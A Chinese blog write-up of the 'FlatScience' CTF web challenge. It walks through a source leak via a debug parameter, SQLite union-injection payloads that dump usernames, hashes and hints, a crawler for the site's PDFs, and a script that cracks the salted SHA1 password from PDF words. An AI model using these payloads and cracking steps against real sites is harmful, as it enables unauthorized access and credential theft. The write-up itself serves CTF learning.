攻防世界 WEB FlatScience

最新推荐文章于 2024-06-19 09:44:13 发布
最新推荐文章于 2024-06-19 09:44:13 发布
阅读量231 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119893605
版权

听说这个题一开始是个1分题。。。。what???????
这题结合了sql注入,爬虫爬取以及pdf识别内容和sha1撞库,你告诉我只有一分???????好吧,可能是我太菜了
打开场景,一堆a链接,打开看到是一堆pdf,查找一下发现也没有啥,扫描一波目录,发现robots.txt,进去看看
发现login.php和admin.php,尝试sql注入,admin页面根本没回显,好吧,那么有问题的页面就只剩一个login.php了
先尝试一个简单的单引号1’,有回显,sqlite数据库,id是注入点,后面密码明显进行了某种加密措施
其实这里是查看源码的,发现里面有提示,<!-- TODO: Remove ?debug-Parameter! -->
那么加上?debug,发现居然直接把PHP源码显示出来了,看来这是个开发页面
有了源码那就好办多了

<?php
ob_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html>
<head>
<style>
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
</style>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
</head>
<body>


<div align=right class=lastmod>
Last Modified: Fri Mar  31:33:7 UTC 1337
</div>

<h1>Login</h1>

Login Page, do not try to hax here plox!<br>


<form method="post">
  ID:<br>
  <input type="text" name="usr">
  <br>
  Password:<br> 
  <input type="text" name="pw">
  <br><br>
  <input type="submit" value="Submit">
</form>

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! -->




<hr noshade>
<address>Flux Horst (Flux dot Horst at rub dot flux)</address>

</body>

这里直接把sql语句给我们了,那么就不需要判断列数,可以直接读取表结构了,当然可以用1’ union select name,sql from sqlite_master --+读取表的列名 //sqlite没有#注释符
sqlite_master是类似于mysql的information_schema的一张表,具体内容看这一篇

https://blog.csdn.net/luoshabugui/article/details/108327936
我们需要读取Users表的sql
查看源码知道他把返回的内容放在了cookie里那么,就burpsuite抓包看的清楚一点
有id name password hint四列,利用group_concat函数一个个读取出来
-1’ union select 1,group_concat(name) from Users–+
-1’ union select 1,group_concat(password) from Users–+
-1’ union select 1,group_concat(hint) from Users–+
密码是sha1值,只能撞库,根据提示,密码是那些pdf里面的某一个值
需要先用爬虫把这些pdf都爬下来,思路很简单,这些文件名都是32位md5值.pdf,二级目录都是数字/index.html,每个页面都先下载pdf文件,然后再处理二级目录,考虑到windows不自带wget,选用curl下载
贴一个python3代码

import requests
import re
import os
import sys

re1 = '[a-fA-F0-9]{32,32}.pdf'
re2 = '[0-9\/]{2,2}index.html'

pdf_list = []
def get_pdf(url):
    print(url)
    req = requests.get(url).text
    re_1 = re.findall(re1,req)
    for i in re_1:
        pdf_url = url+i
        pdf_list.append(pdf_url)
    re_2 = re.findall(re2,req)
    for j in re_2:
        new_url = url+j[0:2]
        get_pdf(new_url)
    return pdf_list

pdf_list = get_pdf('http://111.200.241.244:58602/')
#print(pdf_list)
j=1
for i in pdf_list:
    os.system('curl '+i+' -o '+"文件夹路径"+str(j)+'.pdf') //文件夹路径是你自己的文件路径。。不要以为是这几个字,我把输出命名成1.pdf,2.pdf这样的,根据自己喜好调整
    j=j+1

文件爬好以后进文件夹看一看,ok的化,就需要调用pdfminer去识别每一个pdf的内容,然后根据内容去撞库
先安装pdfminer
pip3 install pdfminer
然后运行脚本他会报错,你需要把pdfminer里面的converter.py手动改一下。。self.pageno+=1改为self.pageno += str(1),可能是我版本的问题pageno调试出来出来是utf-8

from io import StringIO

# python3
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import TextConverter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter

import sys
import string
import os
import hashlib
import importlib
import random
from urllib.request import urlopen
from urllib.request import Request


def get_pdf():
    return [i for i in os.listdir("文件夹路径") if i.endswith("pdf")]


def convert_pdf_to_txt(path_to_file):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    laparams = LAParams()
    device = TextConverter(rsrcmgr, retstr, codec, laparams=laparams)
    fp = open(path_to_file, 'rb')
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    password = ""
    maxpages = 0
    caching = True
    pagenos = set()

    for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password, caching=caching,
                                  check_extractable=True):
        interpreter.process_page(page)

    text = retstr.getvalue()

    fp.close()
    device.close()
    retstr.close()
    return text


def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print("Searching word in " + i)
        pdf_text = convert_pdf_to_txt("文件夹路径" + i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word.encode('utf-8') + 'Salz!'.encode('utf-8')).hexdigest()
            if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'):
                print("Find the password :" + word)
                exit()


if __name__ == "__main__":
    find_password()

跑出来密码是ThinJerboa
拿这个密码去admin.php提交,就可以得到flag
参考视频链接:https://www.bilibili.com/video/BV173411B7HU/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 4分题(fakebook、ics-04、ics-05、FlatScience
闵行小鱼塘
07-16 584
继续ctf的旅程,攻防世界web高手进阶区的4分题:fakebook、ics-04、ics-05、FlatScience
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 286
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界XCTF-WEB入门12题解题报告
最新发布
韩束一叶子
06-19 969
WEB入门题比较适合信息安全专业大一学生,难度低上手快,套路基本都一样ailx101780 次咨询4.9网络安全优秀回答者网络安全硕士去咨询先人一步,掌握WEB安全入门诀窍,相信我,你不会后悔滴~广告WEB安全攻防入门作者 ailx10会员专享¥9.99去查看。
攻防世界Web新手练习篇
m0_63944500的博客
11-19 2310
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
攻防世界web新手题知识点WriteUP及知识点讲解(超超超详细)
qq_62604985的博客
09-19 1077
在url处进入 /robots.txt 查看到以下页面。尝试访问fl0g.php文件得到flag。
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界Web题解析(难度2)
m0_63138919的博客
08-03 870
本文为攻防世界Web题难度为2的解题思路和方法
【愚公系列】2023年05月 攻防世界-Web(shrine)
时光隧道
05-27 7604
Flask是一个轻量级的Web应用程序框架,用于Python编程语言。它是基于Werkzeug WSGI工具箱和Jinja2模板引擎构建的。Flask提供了一组工具和库,可以帮助开发人员构建Web应用程序,包括路由、HTTP请求处理、会话管理和数据存储等。它是一个开源框架,可以在许多领域使用,例如Web开发、物联网、机器学习和数据分析等。Flask包括以下主要组件:Werkzeug:一个WSGI工具库,提供了底层的服务端网关接口(WSGI)实现,用于接收和处理HTTP请求。
攻防世界web进阶区FlatScience
gongjingege的博客
08-05 301
打开链接 给了好几个地址,到处点,全是一些文章(还是英文的) dirsearch扫一下 或者robots.txt 到admin.php里看一下 试一下admin 不行?看一下源码 估计就不是从这上手了,那就login.php吧 试一试sql注入 报错,发现不是mysql,而是sqlite3(那这就难受了啊) 查看源码 url栏?debug= ?debug出现源码泄露 <?php if(isset($_POST['usr']) && isset($_POST['pw'])
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界web模块新手基础解题详细版(1)
m0_46412408的博客
09-05 544
攻防世界web模块新手基础解题详细版(1)PHP2、Web_php_unserialize
攻防世界——web新手模式(全解)
AuroraMiraitowa的博客
12-08 1196
3.我们可以从这里观察到,它上面有一个f10g.php文件不允许我们进入,接下来我们就用好奇的金手指复制一下,然后再将robots.txt替换成f10g.php,进入界面即可得到flag;1.robots协议:它是一个网站与搜索引擎之间的一种协议,它主要是告诉爬虫它们那些可以爬那些不能爬,但这个协议并不是一个规范,所以就很鸡肋(相当于写出来让别人看看而已,没啥用)额,这又是一道送分题,我给各位一个建议,你打CTF时多看看源码也不错,说不定出题人意想不到的把flag给注释掉了…前面写过可以看我之前的文章。
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 390
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
攻防世界-----web知识点总结
m0_62879498的博客
12-03 1468
WEB 一. 网页源代码的方式 在地址栏前面加上view-source,如view-source:https://www.baidu.com 浏览器的设置菜单框中使用开发者工具,也可以查看网页源代码。 二. robots(robtos.txt) robots是网站跟爬虫间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如
攻防世界 WEB Web_python_block_chain
qq_41696858的博客
09-15 6187
这题是区块链题,对区块链不是很了解,想了解原理的建议看这一篇 https://blog.csdn.net/hxhxhxhxx/article/details/108111692 简单介绍一下双花攻击的原理吧,就是区块链是去中心化账本,而且默认长度最长的是主链 如果用户自持有的账本长度大于中心化中心的账本,那么所有的节点都会以当前用户的账本覆盖当前持有的账本,这边是0确认, 就是整个链里就你一个人,所以没有人跟你竞争,所以一定会成功。具体的也不清楚,直接看大佬的脚本吧 具体要改的就是url的三个参数和三个ad
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值